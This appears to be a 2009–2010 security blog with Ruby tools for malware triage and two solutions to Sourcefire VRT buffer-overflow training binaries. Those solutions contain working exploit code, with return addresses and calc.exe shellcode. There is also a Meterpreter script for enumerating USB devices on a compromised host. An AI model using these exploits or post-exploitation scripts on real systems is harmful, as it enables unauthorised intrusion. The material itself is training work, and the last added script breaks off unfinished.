22 Jan 2010

Tool: virustotal.rb

Last year at BlackHat I had some free time on the plane and wrote this script for querying VirusTotal for anti-virus results on a large number of files. I lost this particular script and wrote a different one for a project at work. Now that I have found this one again, I am posting it for consumption to help out anyone doing malware analysis. Below is an example of the output; there is standard text output and XML output. Questions? Comments? Bugs? Let me know and I will take a look.

usage
[hammackj@taco:~/projects/reverse/trunk/virustotal]$ ./virustotal.rb
virustotal.rb v1.0
Jacob Hammack
http://www.hammackj.com

[*] Usage: ./virustotal.rb [mode] <options> [targets]

Modes:
    -x, --xml-output          Print results as xml to stdout
    -f, --search-file FILE    Searches a file of hashes on virus total
    -s, --search-hash HASH    Searches a single hash on virus total
    -h, --help                Show this message

[hammackj@taco:~/projects/reverse/trunk/virustotal]$ ./virustotal.rb -f testhashes.txt
deb2d2527f2bc85a01df628dcb299b08: Scanner: eSafe Result: Win32.TrojanHorse
694e9bc2ade4f30c99d8a59340307e1a: Scanner: - Result: Not Found
4c0f0b57de8c1669aa6f49d285b3865a: Scanner: - Result: Not Found
cb28c0119a39a215dc58e1af05a50bef: Scanner: - Result: Not Found
44e3c404eff8a62ecb4679041a8e9aea: Scanner: - Result: Not Found
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: a-squared Result: Net-Worm.Win32.Kido!IK
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: AhnLab-V3 Result: Win32/Conficker.worm.62976
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: AntiVir Result: Worm/Conficker.AC
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Authentium Result: W32/Downldr2.EXAE
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Avast Result: Win32:Kido-D
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: AVG Result: Worm/Generic_c.YH
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: BitDefender Result: Win32.Worm.Downadup.Gen
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: CAT-QuickHeal Result: I-Worm.Kido.dam.y
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Comodo Result: NetWorm.Win32.Kido.ih3
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: DrWeb Result: Win32.HLLW.Shadow.5
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: eTrust-Vet Result: Win32/Conficker.B
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: F-Prot Result: W32/Downldr2.EXAE
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: F-Secure Result: Worm:W32/Downadup.AB
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Fortinet Result: W32/Conficker.A!worm
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: GData Result: Win32.Worm.Downadup.Gen
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Ikarus Result: Net-Worm.Win32.Kido
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Jiangmin Result: TrojanDownloader.Agent.axwm
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: K7AntiVirus Result: Trojan-Downloader.Win32.Agent.aqfw
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Kaspersky Result: Net-Worm.Win32.Kido.dam.y
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: McAfee Result: W32/Conficker.worm
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: McAfee+Artemis Result: Artemis!D9CB288F3171
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: McAfee-GW-Edition Result: Worm.Conficker.AC
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Microsoft Result: Worm:Win32/Conficker.A
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: NOD32 Result: Win32/Conficker.A
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Norman Result: Conficker.HB
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: nProtect Result: Trojan-Exploit/W32.MS08-067.62976
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Panda Result: W32/Conficker.A.worm
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: PCTools Result: Trojan-Downloader.Agent
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Prevx Result: High Risk Worm
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Rising Result: Hack.Exploit.Win32.MS08-067.k
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Sophos Result: W32/Confick-A
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Sunbelt Result: Worm.Win32.Downad.A
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Symantec Result: W32.Downadup
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: TheHacker Result: Trojan/Downloader.Agent.aqfw
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: TrendMicro Result: WORM_DOWNAD.A
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: VBA32 Result: Worm.Win32.kido.58
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: ViRobot Result: Trojan.Win32.Downloader.62976.AJ
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: VirusBuster Result: Worm.Conficker.BE

Download virustotal.rb
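The text output above is one line per scanner, so a batch of a few hundred hashes is hard to read by eye. The script below is an added example, not part of virustotal.rb: it parses that "hash: Scanner: X Result: Y" format into a per-hash summary (found or not, how many engines flagged it, and which family names they used). The sample lines are copied from the output above; the family alias table (Kido, Downadup, Downad and Confick all mapped to Conficker) is an assumption for the demo and would be extended per investigation.

```ruby
#!/usr/bin/env ruby
# Added example: summarise virustotal.rb text output per hash.
# Not part of the original script; SAMPLE is copied from the post's output.

LINE_RE = /\A([0-9a-fA-F]{32}|[0-9a-fA-F]{40}):\s+Scanner:\s+(\S+)\s+Result:\s+(.+?)\s*\z/

# Vendor names that refer to the same worm (assumed mapping for the demo).
FAMILY_ALIASES = {
  "Conficker" => /kido|downadup|downad|confick/i,
}

SAMPLE = <<~EOS
  deb2d2527f2bc85a01df628dcb299b08: Scanner: eSafe Result: Win32.TrojanHorse
  694e9bc2ade4f30c99d8a59340307e1a: Scanner: - Result: Not Found
  5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: a-squared Result: Net-Worm.Win32.Kido!IK
  5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Microsoft Result: Worm:Win32/Conficker.A
  5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Symantec Result: W32.Downadup
  5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Prevx Result: High Risk Worm
  5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: nProtect Result: Trojan-Exploit/W32.MS08-067.62976
EOS

# Returns { hash => [[scanner, result], ...] }; lines that do not match are skipped.
def parse_vt_output(text)
  out = Hash.new { |h, k| h[k] = [] }
  text.each_line do |line|
    m = LINE_RE.match(line.strip) or next
    out[m[1].downcase] << [m[2], m[3]]
  end
  out
end

def family_for(result)
  FAMILY_ALIASES.each { |name, re| return name if result =~ re }
  nil
end

# Returns { hash => { found:, detections:, scanners:, families: } }.
# A "Scanner: -" / "Not Found" row means VirusTotal has never seen the hash.
def summarize(parsed)
  parsed.each_with_object({}) do |(h, rows), acc|
    found = rows.none? { |s, r| s == "-" && r == "Not Found" }
    hits  = rows.select { |s, r| s != "-" && r != "Not Found" }
    acc[h] = {
      found:      found,
      detections: hits.size,
      scanners:   hits.map(&:first),
      families:   hits.map { |_, r| family_for(r) }.compact.uniq,
    }
  end
end

if __FILE__ == $0
  text = ARGV.empty? ? SAMPLE : File.read(ARGV[0])
  summarize(parse_vt_output(text)).each do |h, s|
    status = s[:found] ? "#{s[:detections]} detection(s)" : "not found"
    puts "#{h}: #{status} #{s[:families].inspect}"
  end
end
```

Run it as `./vtsummary.rb results.txt` (any name; the file is the saved text output of `virustotal.rb -f`). The point of the family column is the one visible in the output above: 38 engines gave the same sample a dozen different names, so sorting by raw result string tells you little, while a small alias table collapses them to one family per hash.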

 

Posted by hammackj


17 Jan 2010

Solution: awbo3.exe - Windows 2000 SP4 R1

After a very hectic week I was able to sit down and work on awbo3.exe from the SourceFire VRT Labs. Since the rules state no static return stack addresses or NOP sleds, it took me a little bit longer to get this one working correctly. I had to get an assist on the backwards jump from mc, but once I figured out that trick it was easy. I don't have a copy of Windows XP SP2 installed, but I will post the solution for XP as soon as I can get SP2 installed. I have the NOP-slide version commented out below; it was a bit easier to make than the specific-spacing version, and it is probably more reliable also. If anyone is interested in the details of how this SEH overflow worked let me know and I will write up a detailed post on how everything worked.

awbo3-exploit.rb
#!/usr/bin/env ruby
#Jacob Hammack
#jacob.hammack@hammackj.com
#exploit for awbo3.exe from Sourcefire VRT labs, Windows 2000 SP4 Rollup 1

poppopret = [0x77fb3326].pack('V') #ntdll.dll pop esi pop ebx ret, w2ksp4r1

#121 bytes, metasploit exec calc.exe
shellcode = "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" +
            "\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
            "\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" +
            "\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" +
            "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" +
            "\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" +
            "\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" +
            "\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" +
            "\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

nseh = "\xEB\x06\x90\x90"                 #short jmp +6, over the SEH handler address
seh = poppopret
stage1 = [0xe8, -1024].pack('CV')         #call rel32, 1024 bytes backwards, thx mc~

#Vuln triggers at 1084, so we need a buffer padding before the shellcode, in this case 120 bytes,
#then the shellcode and the rest of the buffer in A's, so 843 for the rest of the 1084
payload = "A" * 120 + shellcode + "A" * 843 + nseh + seh + stage1
#payload = "\x90" * (1084 - shellcode.length) + shellcode + nseh + seh + stage1

print payload
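The part of this exploit that is easy to get subtly wrong is the arithmetic: the nSEH short jump has to land exactly on stage1, and the backwards call in stage1 has to land in the padding in front of the shellcode rather than inside it. The script below is an added check, not part of the original exploit, that decodes both jumps from the same bytes the exploit emits and reports where they land, for both the fixed 120-byte version and the commented-out NOP-slide version. It uses only the sizes from the exploit above (121-byte shellcode, overwrite at 1084) and needs no target binary.

```ruby
#!/usr/bin/env ruby
# Added example (not from the original post): check the awbo3 payload layout
# and decode the two jumps in the SEH chain before firing it at the debugger.

SHELLCODE_LEN = 121    # metasploit exec calc.exe, as used in the exploit above
OVERWRITE_AT  = 1084   # payload offset where the nSEH/SEH overwrite begins

# Decode the short jmp used as nSEH ("\xEB\x06") at payload offset `at` and
# return the offset it transfers to. rel8 is signed, relative to the end of
# the 2-byte instruction.
def short_jmp_target(at, bytes)
  raise "not a short jmp" unless bytes.getbyte(0) == 0xEB
  rel8 = [bytes.getbyte(1)].pack('C').unpack('c').first
  at + 2 + rel8
end

# Decode the 5-byte "call rel32" used as stage1 at payload offset `at` and
# return the offset it lands on. rel32 is signed, relative to the end of the
# 5-byte instruction (so -1024 from the end of the payload, not from stage1).
def call_rel32_target(at, bytes)
  raise "not a call rel32" unless bytes.getbyte(0) == 0xE8
  rel32 = bytes[1, 4].unpack('l<').first
  at + 5 + rel32
end

# Layout for a given leading pad length: 120 in the post's fixed version,
# OVERWRITE_AT - SHELLCODE_LEN in the commented-out NOP-slide version.
def layout(pad_before)
  filler = OVERWRITE_AT - pad_before - SHELLCODE_LEN
  raise "pad too large" if filler < 0
  nseh   = "\xEB\x06\x90\x90".b
  stage1 = [0xe8, -1024].pack('CV')      # exactly as the exploit builds it
  {
    shellcode:     pad_before...(pad_before + SHELLCODE_LEN),
    filler:        filler,
    nseh_at:       OVERWRITE_AT,
    seh_at:        OVERWRITE_AT + 4,
    stage1_at:     OVERWRITE_AT + 8,
    nseh_target:   short_jmp_target(OVERWRITE_AT, nseh),
    stage1_target: call_rel32_target(OVERWRITE_AT + 8, stage1),
    total:         OVERWRITE_AT + 8 + 5,
  }
end

# True when the backward call lands in the slide in front of the shellcode,
# so execution reaches the shellcode from its first byte instead of mid-body.
def lands_before_shellcode?(l)
  l[:stage1_target] >= 0 && l[:stage1_target] < l[:shellcode].first
end

if __FILE__ == $0
  [120, OVERWRITE_AT - SHELLCODE_LEN].each do |pad|
    l = layout(pad)
    printf "pad=%-4d shellcode@%d..%d nSEH->%d stage1@%d->%d ok=%s\n",
           pad, l[:shellcode].first, l[:shellcode].max, l[:nseh_target],
           l[:stage1_at], l[:stage1_target], lands_before_shellcode?(l)
  end
end
```

For the 120-byte version the call lands at offset 73, which is inside the leading A's: 0x41 decodes as `inc ecx`, so those 47 bytes act as a slide into the shellcode at 120. That is why the "specific spacing" version works at all, and also why it is fragile: move the shellcode earlier than offset 73 and the call lands inside it. The NOP-slide version puts 963 bytes of `\x90` in front, so the same landing point is safe anywhere in that range.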

 

Posted by hammackj


3 Jan 2010

Solution: awbo2.exe

I was feeling bored on Saturday after the wife went to bed, so I took a crack at the SourceFire VRT Labs Advanced Windows Buffer Overflows. I started with the first one; below is the solution in Ruby. The shellcode is provided on the Sourcefire website and all it does is exec calc.exe. This series of executables seems to be all local exploits with an int3 staged for ease of debugging. Most of my time was spent in the debugger getting the spacing just right. I will post the rest of the solutions soon. Any questions?

exploit.rb
#!/usr/bin/env ruby
#Jacob Hammack
#http://www.hammackj.com

read = [0x7C571931].pack('V')    #kernel32 ADD BYTE PTR DS:[EAX],CL
jmpesp = [0x7C5725F3].pack('V')  #kernel32 jmp esp

#metasploit exec calc.exe
shellcode = "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" +
            "\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
            "\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" +
            "\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" +
            "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" +
            "\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" +
            "\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" +
            "\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" +
            "\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

print 'A' * 1024 + read + "JUNK" + jmpesp + shellcode
usage
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>ruby exploit.rb | awbo2.exe

Then your post-mortem debugger will catch the int3 at the beginning of the program; click run and you should see this screen. The addresses are only valid on Windows 2000 SP4 Rollup 1; I provided the instructions to find them if you want to try to get it to work on anything else. I have not tried it on anything except my VM.
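The offsets in these solutions (1024 here, 1084 for awbo3, 117 for homework.exe) are what the debugger time goes into. The usual shortcut is a cyclic pattern: send a non-repeating string, read the four bytes that ended up in EIP (or the SEH record), and look up where they sit in the pattern. The script below is an added example, not from the post; it re-implements the idea behind Metasploit's pattern_create.rb and pattern_offset.rb (upper, lower, digit triples, unique for 20280 bytes). The crash value 0x41306241 used in the demo is constructed.

```ruby
#!/usr/bin/env ruby
# Added example (not from the original post): cyclic pattern generation and
# offset lookup, the normal way to find the padding length for a stack overflow.

# Max unique length of the A..Z / a..z / 0..9 triple pattern: 26*26*10*3 bytes.
MAX_PATTERN = 26 * 26 * 10 * 3

# Build "Aa0Aa1Aa2...Aa9Ab0Ab1..." truncated to `length` bytes.
def pattern_create(length)
  raise ArgumentError, "pattern longer than #{MAX_PATTERN} bytes would repeat" if length > MAX_PATTERN
  out = String.new
  ('A'..'Z').each do |u|
    ('a'..'z').each do |l|
      ('0'..'9').each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out
end

# `needle` is either the 4 characters seen in the debugger ("Ab0A") or the
# register value itself (0x41306241). A register value is little-endian, so
# its low byte is the first byte that was in memory; pack('V') reverses it
# back into memory order before searching. Returns nil if not found.
def pattern_offset(needle, length = MAX_PATTERN)
  needle = [needle].pack('V') if needle.is_a?(Integer)
  pattern_create(length).index(needle)
end

# Demo: the payload shape from exploit.rb above, but with the 'A' * 1024 run
# replaced by the pattern, and a constructed EIP value read off the crash.
def demo
  pat = pattern_create(1200)
  crash_eip = 0x41306241            # constructed: what EIP held at the int3
  { offset: pattern_offset(crash_eip), bytes: [crash_eip].pack('V'), sent: pat.length }
end

if __FILE__ == $0
  d = demo
  puts "EIP 0x%08x = %p in memory, found at offset %d of %d sent" %
       [0x41306241, d[:bytes], d[:offset], d[:sent]]
end
```

Once the offset is known, `'A' * offset + ret + rest` replaces the pattern, exactly as the solution above does with 1024. The same lookup works for an SEH overwrite: read the handler address the debugger shows in the SEH chain instead of EIP.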

[screenshot: awbo2pwnage]

 

Posted by hammackj


1 Jan 2010

Tool: aviraparser.rb

So a while back I downloaded and set up the Avira Professional beta for Linux; it is a really good product for finding malware. This product has two downsides: 1) it does not work on PowerPC and 2) the logs are in a lame text format. So I needed a way to parse all the endless logs from the binaries I have collected to see if anything was interesting enough to go ahead and RE the malicious code. Here is a simple script that will parse the raw Avira logs and write the results to screen for easy viewing. The version I use in production is built into a Rails app and too complex to post here. Sorry.

aviraparser.rb
#!/usr/bin/env ruby
#Jacob Hammack
#http://www.hammackj.com
#Ruby parser for the output of the Avira Professional for linux results
#This script assumes filenames are the sha1 hash of the file
#to change this

f = File.new(ARGV[0])

f.each { |line|
  lines = line.split(':')
  date = lines[0]
  time = lines[1]
  time1 = lines[2]
  av = lines[3]
  type = lines[4]
  result = lines[5]
  results = Array.new

  printf "Date: %s:%s:%s\n", date, time, time1
  printf "AntiVirus: %s\n", av

  if type =~ /WARNING .*\/([0-9a-fA-F]{40})(.*)/
    type = $1
    result = $2
    result[0] = ' '
    result.strip!
    printf "Filename: %s\n", type
    printf "Result: %s\n", result
  elsif type =~ /ALERT .*\/([0-9a-fA-F]{40})/
    type = $1
    printf "filename: %s\n", type
    result.scan(/(.*);(.*);(.*)/) { |s, c, d|
      printf "Shortname: %s\n", s
      printf "Category: %s\n", c
      printf "Description: %s\n", d
    }
  end

  puts "\n"
}
output
[hammackj@fajitas:~/Desktop]$ ./avguparser.rb filescan-20090615.log
Date: 2009-06-15 13:41:25 hoss avscan[21821]
AntiVirus: AVGU

Date: 2009-06-15 13:41:40 hoss avscan[21821]
AntiVirus: AVGU
filename: 00A66A90C0B2ECC0DEB975BE1F47526FD598D4A0
Shortname: TR/Agent.225280.I
Category: trojan
Description: Is the Trojan horse TR/Agent.225280.I

Date: 2009-06-15 13:41:41 hoss avscan[21821]
AntiVirus: AVGU
filename: 00B224187CE4C7E378E954DB76D1AF86DDF1403B
Shortname: ADSPY/Mywebsearch.AN.2
Category: adware
Description: Contains detection pattern of the Ad- or Spyware ADSPY/Mywebsearch.AN.2

[hammackj@fajitas:~/Desktop]$

 

Posted by hammackj


27 Jan 2009

Meterpreter Script: usbenum.rb

Last week I was looking around the Metasploit ticket system for something that I could do to contribute back to the community that has made pen testing so easy for everyone. I found ticket 700: a simple Meterpreter script to enumerate USB device information on the remote computer. I based it on the winenum.rb script from Carlos Perez, so it is very similar to that script. I am sure this script could be cleaned up some to be shorter, but I only spent about an hour on it. Questions? Comments? Post em up...
usbenum.rb
#
#Meterpreter script for basic usb device enumeration
#Based on the winenum.rb script by Carlos Perez
#Provided by Jacob Hammack at jacob.hammack[at]hammackj.com
#Version: 0.0.1

@client = client
opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-a" => [ false, "Enumerate all connected usb devices" ],
  "-s" => [ false, "Enumerate all connected usb storage devices" ]
)

allUsb = false
usbStor = false

opts.parse(args) { |opt, idx, val|
  case opt
  when "-a"
    allUsb = true
  when "-s"
    usbStor = true
  when "-h"
    print_line "USBEnum -- Enumerates all USB devices"
    print_line
    print_line "Retrieves information about the usb devices that have been connected"
    print_line "to the system. Results are stored in #{::File.join(Msf::Config.log_directory, 'usbenum')}"
    print_line(opts.usage)
    raise Rex::Script::Completed
  end
}

host,port = @client.tunnel_peer.split(':')
info = @client.sys.config.sysinfo

# Create Filename info to be appended to downloaded files
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S") + "-" + sprintf("%.5d", rand(100000))

# Create a directory for the logs
logs = ::File.join(Msf::Config.log_directory, 'usbenum', info['Computer'] + filenameinfo)

# Create the log directory
::FileUtils.mkdir_p(logs)

#logfile name
dest = logs + "/" + info['Computer'] + filenameinfo + ".txt"

#Enumerates a registry key and returns its subkeys
#Jacked from the winenum.rb script by carlos perez
def reg_enumkeys(key)
  subkeys = []
  begin
    root_key, base_key = @client.sys.registry.splitkey(key)
    open_key = @client.sys.registry.open_key(root_key, base_key, KEY_READ)
    keys = open_key.enum_key
    keys.each { |subkey|
      subkeys << subkey
    }
    open_key.close
  rescue ::Exception => e
    return nil
  end
  return subkeys
end

#Gets a reg key value
#Jacked from the winenum.rb script by carlos perez
def reg_getvaldata(key, valname)
  value = nil
  begin
    root_key, base_key = @client.sys.registry.splitkey(key)
    open_key = @client.sys.registry.open_key(root_key, base_key, KEY_READ)
    v = open_key.query_value(valname)
    value = v.data
    open_key.close
  rescue ::Exception => e
    return nil
  end
  return value
end

#writes out data to file
#Jacked from the winenum.rb script by carlos perez
def filewrt(file2wrt, data2wrt)
  output = ::File.open(file2wrt, "a")
  data2wrt.each_line do |d|
    output.puts(d)
  end
  output.close
end

allUsbKey = "HKLM\\System\\CurrentControlSet\\Enum\\USB\\"
usbStorKey = "HKLM\\System\\CurrentControlSet\\Enum\\USBStor\\"

if allUsb == true or usbStor == true
  print_status("Running Windows USB Enumeration Meterpreter Script")
  info = @client.sys.config.sysinfo
  header = "Date: #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}\n"
  header << "Running as: #{@client.sys.config.getuid}\n"
  header << "Host: #{info['Computer']}\n"
  header << "OS: #{info['OS']}\n"
  header << "\n\n\n"
  print_status("Saving report to #{dest}")
  filewrt(dest, header)
end

if allUsb == true
  begin
    subkeys = reg_enumkeys(allUsbKey)
    subkeys.each { |key|
      devices = reg_enumkeys(allUsbKey + key)
      devices.each { |dev|
        val = reg_getvaldata(allUsbKey + key + "\\" + dev + "\\", "HardwareID")
        hardwareid = "HardwareID:" + val unless val == nil
        val = reg_getvaldata(allUsbKey + key + "\\" + dev + "\\", "Driver")
        driver = "Driver:" + val unless val == nil
        val = reg_getvaldata(allUsbKey + key + "\\" + dev + "\\", "ClassGUID")
        classguid = "ClassGUID:" + val unless val == nil
        val = reg_getvaldata(allUsbKey + key + "\\" + dev + "\\", "Mfg")
        mfg = "mfg:" + val unless val == nil
        val = reg_getvaldata(allUsbKey + key + "\\" + dev + "\\", "DeviceDesc")
        devicedesc = "DeviceDesc:" + val unless val == nil
        val = reg_getvaldata(allUsbKey + key + "\\" + dev + "\\", "LocationInformation")
        locationinformation = "LocationInformation:" + val unless val == nil

        print_status hardwareid unless hardwareid == nil
        print_status driver unless driver == nil
        print_status classguid unless classguid == nil
        print_status mfg unless mfg == nil
        print_status devicedesc unless devicedesc == nil
        print_status locationinformation unless locationinformation == nil
        print_status ""

        filewrt(dest, hardwareid + "\n") unless hardwareid == nil
        filewrt(dest, driver + "\n") unless driver == nil
        filewrt(dest, classguid + "\n") unless classguid == nil
        filewrt(dest, mfg + "\n") unless mfg == nil
        filewrt(dest, devicedesc + "\n") unless devicedesc == nil
        filewrt(dest, locationinformation + "\n") unless locationinformation == nil
        filewrt(dest, "\n")
      }
    }
  rescue ::Exception => e
    print_status("Unable to enumerate USB registry #{e}")
  end
end

if usbStor == true
  begin
    subkeys = reg_enumkeys(usbStorKey)
    subkeys.each { |key|
      devices = reg_enumkeys(usbStorKey + key)
      devices.each { |dev|
        val = reg_getvaldata(usbStorKey + key + "\\" + dev + "\\", "HardwareID")
        hardwareid = "HardwareID:" + val unless val == nil
        val = reg_getvaldata(usbStorKey + key + "\\" + dev + "\\", "Driver")
        driver = "Driver:" + val unless val == nil
        val = reg_getvaldata(usbStorKey + key + "\\" + dev + "\\", "ClassGUID")
        classguid = "ClassGUID:" + val unless val == nil
        val = reg_getvaldata(usbStorKey + key + "\\" + dev + "\\", "Mfg")
        mfg = "mfg:" + val unless val == nil
        val = reg_getvaldata(usbStorKey + key + "\\" + dev + "\\", "DeviceDesc")
        devicedesc = "DeviceDesc:" + val unless val == nil
        val = reg_getvaldata(usbStorKey + key + "\\" + dev + "\\", "FriendlyName")
        friendlyname = "FriendlyName:" + val unless val == nil

        print_status hardwareid unless hardwareid == nil
        print_status driver unless driver == nil
        print_status classguid unless classguid == nil
        print_status mfg unless mfg == nil
        print_status devicedesc unless devicedesc == nil
        print_status friendlyname unless friendlyname == nil
        print_status ""

        filewrt(dest, hardwareid + "\n") unless hardwareid == nil
        filewrt(dest, driver + "\n") unless driver == nil
        filewrt(dest, classguid + "\n") unless classguid == nil
        filewrt(dest, mfg + "\n") unless mfg == nil
        filewrt(dest, devicedesc + "\n") unless devicedesc == nil
        filewrt(dest, friendlyname + "\n") unless friendlyname == nil
        filewrt(dest, "\n")
      }
    }
  rescue ::Exception => e
    print_status("Unable to enumerate USB registry #{e}")
  end
end

 

Posted by hammackj


26 Jan 2009

Tool: checkip.rb

Often I find myself in need of accessing my home network for various reasons, but the IP address changes more often than not. So I wrote this little script that will connect to whatismyip.com and email me if the IP has changed. I also set up a crontab entry that will run the script every hour to look for IP address changes. The code and the crontab are posted below if anyone feels they could use the script. Please let me know if there are any errors or if you need help.

checkip.rb
#!/usr/bin/env ruby
#Jacob Hammack
#http://www.hammackj.com
#checkip.rb is a tool to check the internet facing ip and email a specific user if the ip changes from the previously noted ip

require 'rubygems'
require 'open-uri'
require 'hpricot' #sudo gem install hpricot
require 'net/smtp'

$FROM_EMAIL = "FROMEMAILADDRESSHERE"
$TO_EMAIL = "TOEMAILADDRESSHERE"

# read_ip() reads the locally stored .checkip file for the last known ip
#
def read_ip()
  ip = ""
  begin
    File.open(".checkip", "r") { |f|
      ip = f.gets()
    }
  rescue => err
    #file doesn't exist, can ignore it
  end
  return ip
end

# main() checks the whatismyip.com website for changes in ip address stored locally
#
def main()
  puts "checkip.rb\nJacob Hammack\nhttp://www.hammackj.com\n"
  new_ip = Hpricot(open("http://www.whatismyip.com/automation/n09230945.asp"))
  new_ip = new_ip.html.chomp
  ip = read_ip()
  ip.chomp! unless ip == nil

  if new_ip != ip
    puts "[!] Different IP Address Detected emailing admin!"
    email_admin(new_ip)
    File.open(".checkip", "w") { |f|
      f.puts new_ip
    }
  else
    puts "[*] No IP change"
  end
end

# email_admin(ip) sends an email to the $TO_EMAIL variable using a local sendmail mta
#
def email_admin(ip)
  msg = sprintf "From: checkip.rb <%s>\nTo: %s <%s>\nSubject: Your IP has been updated!\nDate: %s\nMessage-Id: <%s@hammackj.net>\n\nYour IP address has changed to %s\n", $FROM_EMAIL, $FROM_EMAIL, $TO_EMAIL, Time.now, ip, ip
  Net::SMTP.start('localhost', 25) do |smtp|
    smtp.send_message msg, $FROM_EMAIL, $TO_EMAIL
  end
end

main()
crontab -l
[hammackj@frijoles:/opt/scripts]# sudo crontab -l
# m h  dom mon dow   command
0 * * * * /usr/bin/ruby /opt/scripts/checkip.rb
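One thing worth checking in a script like this: the response body from whatismyip.com arrives over plain HTTP and goes straight into the Message-Id header and the mail body, and into the .checkip state file. If the site returns an error page, a redirect body, or anything containing a newline, that ends up in mail headers. The example below is added here and is not part of checkip.rb: it accepts only a bare dotted-quad before the value is used anywhere, decides whether to notify without overwriting state on a bad fetch, and builds the mail with a random Message-Id instead of network data. The response strings in the test and the `checkip.local` Message-Id domain are constructed for the demo.

```ruby
#!/usr/bin/env ruby
# Added example, not part of checkip.rb: validate the fetched address before it
# is written to state or placed in mail headers.
require 'ipaddr'
require 'securerandom'
require 'time'

# Returns the normalised dotted-quad, or nil for anything that is not a bare
# IPv4 literal (HTML, whitespace-embedded newlines, octets above 255).
def extract_ip(body)
  s = body.to_s.strip
  return nil unless s =~ /\A\d{1,3}(\.\d{1,3}){3}\z/
  IPAddr.new(s).to_s
rescue ArgumentError     # IPAddr::InvalidAddressError is an ArgumentError
  nil
end

# :changed / :unchanged / :invalid. On :invalid the caller must neither mail
# nor rewrite .checkip, otherwise one bad response poisons the next run.
def decide(previous, fetched)
  ip = extract_ip(fetched)
  return :invalid if ip.nil?
  ip == previous ? :unchanged : :changed
end

# Build the notification from a validated address only. The Message-Id is a
# random token (domain "checkip.local" is an assumed placeholder) rather than
# anything that came back from the network.
def build_message(from, to, ip)
  raise ArgumentError, "unvalidated ip" unless extract_ip(ip) == ip
  [
    "From: checkip.rb <#{from}>",
    "To: <#{to}>",
    "Subject: Your IP has been updated!",
    "Date: #{Time.now.rfc2822}",
    "Message-Id: <#{SecureRandom.hex(16)}@checkip.local>",
    "",
    "Your IP address has changed to #{ip}",
    ""
  ].join("\r\n")
end

if __FILE__ == $0
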